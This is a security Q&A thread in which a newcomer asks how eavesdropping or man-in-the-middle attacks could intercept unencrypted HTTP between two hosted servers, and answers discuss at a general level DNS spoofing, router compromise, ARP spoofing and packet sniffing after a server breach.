6

I’m new to security, and I’m wondering how man-in-the-middle and eavesdropping attacks between web servers work, rather than between personal devices and servers.

Most questions I see here about man-in-the-middle attacks seem to involve a personal Web browser communicating with a server over an insecure Internet connection. If they’re using unencrypted HTTP over something like public wi-fi, then it’s really easy to intercept and read their communications from packets that they broadcast on the same network, as Firesheep shows.

But how would an attacker perform an attack on the connection between two public Internet servers communicating over unencrypted HTTP?

I know that if HTTP messages aren’t encrypted, man-in-the-middle and eavesdropping attacks can occur. But I’m wondering about actual risk, feasibility, and practicality of such an attack.

Let’s say that there are two servers, A and B.
Server A is a VPS or something, from Rackspace or Linode, under your control.
Server B is another organization’s public web server that is not under your control.
Server B does not support HTTPS; it requires HTTP and session cookies.
Server A needs to intermittently connect to server B on server B’s website: logging in, doing things, logging out.
Server A’s IP address might or might not be public—it’s exposed to server B, in any case. Server B’s IP address is public.

How would an attacker eavesdrop or intercept this connection if they had the resources of an individual? It’s not like the VPS uses a public local network to which individuals could connect.

The big thing I can think of is that an attacker might launch a DNS-spoofing attack against the DNS servers of the VPS company that hosts server A. So you’d have to trust that the VPS company’s DNS servers won’t get compromised, right? Is this required trust recursive to servers outside the organization, all the way to the root server? What kind of resources would an attacker need to attack these servers?

Are there any other methods that a man-in-the-middle or eavesdropping attack might occur between these two servers? What resources would those also require?

There are some other questions about man-in-the-middle attack techniques other than wi-fi interception—although they are broader than this question, which is specifically about unencrypted HTTP between two hosted servers. These other questions include:

user3842252
  • 105
  • 6
  • What if one of the routers on the path between the two servers gets compromised? For example a rogue employee or a breach at an ISP that allows malicious people to log into the routers? – André Borie Mar 11 '16 at 21:51
  • @AndréBorie That could be a possibility, though being able to compromise the ISPs of either server A or B would probably be unlikely for random people. I don't have a sense of how feasible different types of attacks such as this, DNS spoofing, packet sniffing, etc. might be. As long as I secure my own VPS (server A) well, a random person elsewhere who wishes deliberately target me would have a difficult time determining which routers are involved on the path between the two servers…or would they? – user3842252 Mar 12 '16 at 03:54

2 Answers2

1

Something I've seen before, and is talked about in a DefCon talk, is people will setup a proxy on something like your VPS in the example and capture the traffic between the user and the server that's going through the proxy. They could also choose to inject JavaScript or return false data to you if they so desired.

For an attacker to sniff all of the traffic going to a web server, they would need to have remote access to it, or the network it's on for the very least. They'd also need to be able to transfer the collected data to themselves. I've heard of hackers commonly using VPSs to hide their identity whenever they've cracked into a web server and attempting to perform such attacks. This might be where you've got this from.

As for the resources that would be required; A packet sniffer such as wireshark would work. Also an exploit for a vulnerability on the web server would be needed as well.

xorist
  • 870
  • 4
  • 15
  • Thanks for answering. Both this answer and the other answer seem to require that the attacker gain shell access to server A or B. Assuming that this is particularly unlikely, are there other ways to eavesdrop that are feasible for non-nation-state attackers (e.g., individual attackers) that do not rely on shell access to server A or B (e.g., DNS spoofing)? – user3842252 Mar 12 '16 at 03:45
  • 2
    Access doesn't necessarily have to be from a shell. There are many vectors of attack a hacker may use to obtain access to a server. – xorist Mar 12 '16 at 03:46
  • 1
    Yes, but now you're usually getting into more advanced types of attacks you'll only find if you're a dedicated 0day attack researcher, or you run an underground hacking mob. – xorist Mar 12 '16 at 03:47
  • The attacker doesn't necessarily need access to Server A or Server B. If the communication is unencrypted, and the attacker has access to any other server that is in the same network segment (e.g. an admin computer), they still may be able to MitM traffic through various other network means (e.g. ARP spoofing). – Casey Mar 14 '16 at 18:10
  • 1
    This is true if you're on the same local network. Please re-read his question. The scenario he had as an example doesn't include the attacker being on the same local network as the victim. – xorist Mar 14 '16 at 18:11
  • But I understand what you mean. Thank you for your input, I'll revise my answer. – xorist Mar 14 '16 at 18:17
1

As an attacker, if there is a vulnerability that would allow me to gain access to Server A (always assume an attacker can gain root access if they can get a restricted shell on the server), then I would be able to sniff the network traffic from Server A to Server B, e.g. using tcpdump. Anything sent over HTTP will be clear text.

Casey
  • 915
  • 6
  • 19